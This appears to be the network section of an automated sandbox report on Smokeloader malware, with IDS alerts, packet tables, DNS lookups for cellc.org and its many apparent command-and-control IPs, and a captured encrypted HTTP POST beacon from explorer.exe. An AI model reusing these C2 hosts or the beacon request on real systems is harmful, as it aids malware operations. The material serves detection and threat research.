05/02/24-20:49:25.562996 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49744 | 80 | 192.168.2.4 | 186.10.34.243
05/02/24-20:49:29.611454 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49747 | 80 | 192.168.2.4 | 186.10.34.243
05/02/24-20:49:38.222924 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49754 | 80 | 192.168.2.4 | 186.10.34.243
05/02/24-20:49:33.652088 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49750 | 80 | 192.168.2.4 | 186.10.34.243
05/02/24-20:49:35.713703 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49752 | 80 | 192.168.2.4 | 186.10.34.243
05/02/24-20:49:30.529068 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49748 | 80 | 192.168.2.4 | 186.10.34.243
05/02/24-20:49:26.484537 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49745 | 80 | 192.168.2.4 | 186.10.34.243
05/02/24-20:49:27.548348 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49746 | 80 | 192.168.2.4 | 186.10.34.243
05/02/24-20:49:31.455151 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49749 | 80 | 192.168.2.4 | 186.10.34.243
05/02/24-20:49:39.138361 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49755 | 80 | 192.168.2.4 | 186.10.34.243
05/02/24-20:49:34.799212 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49751 | 80 | 192.168.2.4 | 186.10.34.243
05/02/24-20:49:37.305666 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49753 | 80 | 192.168.2.4 | 186.10.34.243
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 2, 2024 20:47:57.690700054 CEST | 49734 | 443 | 192.168.2.4 | 104.21.79.229
May 2, 2024 20:47:57.690728903 CEST | 443 | 49734 | 104.21.79.229 | 192.168.2.4
May 2, 2024 20:47:57.690793037 CEST | 49734 | 443 | 192.168.2.4 | 104.21.79.229
May 2, 2024 20:47:57.701436043 CEST | 49734 | 443 | 192.168.2.4 | 104.21.79.229
May 2, 2024 20:47:57.701458931 CEST | 443 | 49734 | 104.21.79.229 | 192.168.2.4
May 2, 2024 20:47:57.890803099 CEST | 443 | 49734 | 104.21.79.229 | 192.168.2.4
May 2, 2024 20:47:57.890863895 CEST | 49734 | 443 | 192.168.2.4 | 104.21.79.229
May 2, 2024 20:47:57.979834080 CEST | 49734 | 443 | 192.168.2.4 | 104.21.79.229
May 2, 2024 20:47:57.979866028 CEST | 443 | 49734 | 104.21.79.229 | 192.168.2.4
May 2, 2024 20:47:57.980077982 CEST | 443 | 49734 | 104.21.79.229 | 192.168.2.4
May 2, 2024 20:47:57.980145931 CEST | 49734 | 443 | 192.168.2.4 | 104.21.79.229
May 2, 2024 20:47:57.983741999 CEST | 49734 | 443 | 192.168.2.4 | 104.21.79.229
May 2, 2024 20:47:58.024121046 CEST | 443 | 49734 | 104.21.79.229 | 192.168.2.4
May 2, 2024 20:47:58.486073017 CEST | 443 | 49734 | 104.21.79.229 | 192.168.2.4
May 2, 2024 20:47:58.486129045 CEST | 49734 | 443 | 192.168.2.4 | 104.21.79.229
May 2, 2024 20:47:58.486150980 CEST | 443 | 49734 | 104.21.79.229 | 192.168.2.4
May 2, 2024 20:47:58.486164093 CEST | 443 | 49734 | 104.21.79.229 | 192.168.2.4
May 2, 2024 20:47:58.486198902 CEST | 49734 | 443 | 192.168.2.4 | 104.21.79.229
May 2, 2024 20:47:58.492477894 CEST | 49734 | 443 | 192.168.2.4 | 104.21.79.229
May 2, 2024 20:47:58.492492914 CEST | 443 | 49734 | 104.21.79.229 | 192.168.2.4
May 2, 2024 20:49:25.341712952 CEST | 49744 | 80 | 192.168.2.4 | 186.10.34.243
May 2, 2024 20:49:25.562657118 CEST | 80 | 49744 | 186.10.34.243 | 192.168.2.4
May 2, 2024 20:49:25.562808990 CEST | 49744 | 80 | 192.168.2.4 | 186.10.34.243
May 2, 2024 20:49:25.562995911 CEST | 49744 | 80 | 192.168.2.4 | 186.10.34.243
May 2, 2024 20:49:25.563019991 CEST | 49744 | 80 | 192.168.2.4 | 186.10.34.243
May 2, 2024 20:49:25.783857107 CEST | 80 | 49744 | 186.10.34.243 | 192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:26.257427931 CEST8049744186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:26.258093119 CEST8049744186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:26.258172989 CEST4974480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.259269953 CEST4974480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.263334990 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.481446981 CEST8049744186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:26.484283924 CEST8049745186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:26.484385967 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.484536886 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.484560013 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:26.705256939 CEST8049745186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:27.180330038 CEST8049745186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:27.180351973 CEST8049745186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:27.180466890 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.180681944 CEST4974580192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.183002949 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.400893927 CEST8049745186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:27.403151035 CEST8049746186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:27.403222084 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.548347950 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.548413992 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:27.770255089 CEST8049746186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:28.469897985 CEST8049746186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:28.470249891 CEST8049746186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:28.470312119 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.384404898 CEST4974680192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.388956070 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.606779099 CEST8049746186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:29.611124039 CEST8049747186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:29.611211061 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.611454010 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.611469030 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:29.832420111 CEST8049747186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:30.304878950 CEST8049747186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:30.304923058 CEST8049747186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:30.305033922 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.305475950 CEST4974780192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.308456898 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.525476933 CEST8049747186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:30.528825045 CEST8049748186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:30.528892040 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.529067993 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.529092073 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:30.750344992 CEST8049748186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:31.224658966 CEST8049748186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:31.225027084 CEST8049748186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:31.225100040 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.225140095 CEST4974880192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.228127956 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.447959900 CEST8049748186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:31.450436115 CEST8049749186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:31.450510979 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.455151081 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.455168009 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:31.675467014 CEST8049749186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:32.375453949 CEST8049749186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:32.375847101 CEST8049749186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:32.375910997 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.388813019 CEST4974980192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.393511057 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.609530926 CEST8049749186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:33.614438057 CEST8049750186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:33.614521980 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.652087927 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.652129889 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:33.872967958 CEST8049750186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:34.573210001 CEST8049750186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:34.573564053 CEST8049750186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:34.573663950 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:34.573909998 CEST4975080192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:34.578109980 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:34.794158936 CEST8049750186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:34.798652887 CEST8049751186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:34.798793077 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:34.799211979 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:34.799297094 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.020517111 CEST8049751186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:35.490858078 CEST8049751186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:35.490885973 CEST8049751186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:35.490962982 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.491184950 CEST4975180192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.493469000 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.711565971 CEST8049751186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:35.713392973 CEST8049752186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:35.713483095 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.713702917 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.713702917 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:35.935173988 CEST8049752186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:36.407660007 CEST8049752186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:36.408839941 CEST8049752186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:36.408899069 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.081377983 CEST4975280192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.085226059 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.302058935 CEST8049752186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:37.305375099 CEST8049753186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:37.305505991 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.305665970 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.305697918 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:37.525954008 CEST8049753186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.000391006 CEST8049753186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.000428915 CEST8049753186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.000608921 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.000945091 CEST4975380192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.003226995 CEST4975480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.220349073 CEST8049753186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.222711086 CEST8049754186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.222778082 CEST4975480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.222923994 CEST4975480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.222948074 CEST4975480192.168.2.4186.10.34.243
                                                                                                                                                                                        May 2, 2024 20:49:38.443471909 CEST8049754186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.914377928 CEST8049754186.10.34.243192.168.2.4
                                                                                                                                                                                        May 2, 2024 20:49:38.914916039 CEST8049754186.10.34.243192.168.2.4
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| May 2, 2024 20:49:38.914973021 CEST | 49754 | 80 | 192.168.2.4 | 186.10.34.243 |
| May 2, 2024 20:49:38.915002108 CEST | 49754 | 80 | 192.168.2.4 | 186.10.34.243 |
| May 2, 2024 20:49:38.918111086 CEST | 49755 | 80 | 192.168.2.4 | 186.10.34.243 |
| May 2, 2024 20:49:39.134912968 CEST | 80 | 49754 | 186.10.34.243 | 192.168.2.4 |
| May 2, 2024 20:49:39.137850046 CEST | 80 | 49755 | 186.10.34.243 | 192.168.2.4 |
| May 2, 2024 20:49:39.137921095 CEST | 49755 | 80 | 192.168.2.4 | 186.10.34.243 |
| May 2, 2024 20:49:39.138360977 CEST | 49755 | 80 | 192.168.2.4 | 186.10.34.243 |
| May 2, 2024 20:49:39.138421059 CEST | 49755 | 80 | 192.168.2.4 | 186.10.34.243 |
| May 2, 2024 20:49:39.359018087 CEST | 80 | 49755 | 186.10.34.243 | 192.168.2.4 |
| May 2, 2024 20:49:39.830506086 CEST | 80 | 49755 | 186.10.34.243 | 192.168.2.4 |
| May 2, 2024 20:49:39.830574036 CEST | 80 | 49755 | 186.10.34.243 | 192.168.2.4 |
| May 2, 2024 20:49:39.830651045 CEST | 49755 | 80 | 192.168.2.4 | 186.10.34.243 |
| May 2, 2024 20:49:39.869959116 CEST | 49755 | 80 | 192.168.2.4 | 186.10.34.243 |
| May 2, 2024 20:49:40.090651989 CEST | 80 | 49755 | 186.10.34.243 | 192.168.2.4 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| May 2, 2024 20:47:57.588154078 CEST | 49990 | 53 | 192.168.2.4 | 1.1.1.1 |
| May 2, 2024 20:47:57.684519053 CEST | 53 | 49990 | 1.1.1.1 | 192.168.2.4 |
| May 2, 2024 20:47:58.498101950 CEST | 57462 | 53 | 192.168.2.4 | 1.1.1.1 |
| May 2, 2024 20:47:58.655678034 CEST | 53 | 57462 | 1.1.1.1 | 192.168.2.4 |
| May 2, 2024 20:49:19.573955059 CEST | 51682 | 53 | 192.168.2.4 | 1.1.1.1 |
| May 2, 2024 20:49:20.559111118 CEST | 51682 | 53 | 192.168.2.4 | 1.1.1.1 |
| May 2, 2024 20:49:21.575362921 CEST | 51682 | 53 | 192.168.2.4 | 1.1.1.1 |
| May 2, 2024 20:49:23.574848890 CEST | 51682 | 53 | 192.168.2.4 | 1.1.1.1 |
| May 2, 2024 20:49:24.649153948 CEST | 53 | 51682 | 1.1.1.1 | 192.168.2.4 |
| May 2, 2024 20:49:24.649199963 CEST | 53 | 51682 | 1.1.1.1 | 192.168.2.4 |
| May 2, 2024 20:49:24.649211884 CEST | 53 | 51682 | 1.1.1.1 | 192.168.2.4 |
| May 2, 2024 20:49:24.649255037 CEST | 53 | 51682 | 1.1.1.1 | 192.168.2.4 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| May 2, 2024 20:47:57.588154078 CEST | 192.168.2.4 | 1.1.1.1 | 0x4232 | Standard query (0) | 2no.co | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:47:58.498101950 CEST | 192.168.2.4 | 1.1.1.1 | 0x9dd | Standard query (0) | rgcVXPIqSMzHmoPyVwzhcGh.rgcVXPIqSMzHmoPyVwzhcGh | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:19.573955059 CEST | 192.168.2.4 | 1.1.1.1 | 0xc23e | Standard query (0) | cellc.org | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:20.559111118 CEST | 192.168.2.4 | 1.1.1.1 | 0xc23e | Standard query (0) | cellc.org | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:21.575362921 CEST | 192.168.2.4 | 1.1.1.1 | 0xc23e | Standard query (0) | cellc.org | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:23.574848890 CEST | 192.168.2.4 | 1.1.1.1 | 0xc23e | Standard query (0) | cellc.org | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| May 2, 2024 20:47:57.684519053 CEST | 1.1.1.1 | 192.168.2.4 | 0x4232 | No error (0) | 2no.co | | 104.21.79.229 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:47:57.684519053 CEST | 1.1.1.1 | 192.168.2.4 | 0x4232 | No error (0) | 2no.co | | 172.67.149.76 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:47:58.655678034 CEST | 1.1.1.1 | 192.168.2.4 | 0x9dd | Name error (3) | rgcVXPIqSMzHmoPyVwzhcGh.rgcVXPIqSMzHmoPyVwzhcGh | none | none | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649153948 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 186.10.34.243 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649153948 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 190.218.33.18 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649153948 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 189.141.134.164 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649153948 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 95.158.162.200 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649153948 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 181.197.122.66 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649153948 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 187.228.55.117 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649153948 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 189.181.37.206 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649153948 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 211.171.233.126 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649153948 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 186.145.236.109 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649153948 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 148.230.249.9 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649199963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 186.10.34.243 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649199963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 190.218.33.18 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649199963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 189.141.134.164 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649199963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 95.158.162.200 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649199963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 181.197.122.66 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649199963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 187.228.55.117 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649199963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 189.181.37.206 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649199963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 211.171.233.126 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649199963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 186.145.236.109 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649199963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 148.230.249.9 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649211884 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 186.10.34.243 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649211884 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 190.218.33.18 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649211884 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 189.141.134.164 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649211884 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 95.158.162.200 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649211884 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 181.197.122.66 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649211884 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 187.228.55.117 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649211884 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 189.181.37.206 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649211884 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 211.171.233.126 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649211884 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 186.145.236.109 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649211884 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 148.230.249.9 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649255037 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 186.10.34.243 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649255037 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 190.218.33.18 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649255037 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 189.141.134.164 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649255037 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 95.158.162.200 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649255037 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 181.197.122.66 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649255037 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 187.228.55.117 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649255037 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 189.181.37.206 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649255037 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 211.171.233.126 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649255037 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 186.145.236.109 | A (IP address) | IN (0x0001) | false |
| May 2, 2024 20:49:24.649255037 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | cellc.org | | 148.230.249.9 | A (IP address) | IN (0x0001) | false |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49744 | 186.10.34.243 | 80 | 2580 | C:\Windows\explorer.exe |

May 2, 2024 20:49:25.562995911 CEST, 279 bytes transferred, OUT:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ynwsxoervaie.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 198
Host: cellc.org

May 2, 2024 20:49:25.563019991 CEST, 198 bytes transferred, OUT:
Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 58 bb ea
Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA .[k,vuWXVivsuxZH2zvR!XjoN]D}_V5vs(8$y:HQ(b`AMJ

May 2, 2024 20:49:26.257427931 CEST, 178 bytes transferred, IN:
HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Thu, 02 May 2024 18:49:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/7.4.33
Data Raw: 04 00 00 00 72 e8 85 ed
Data Ascii: r


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
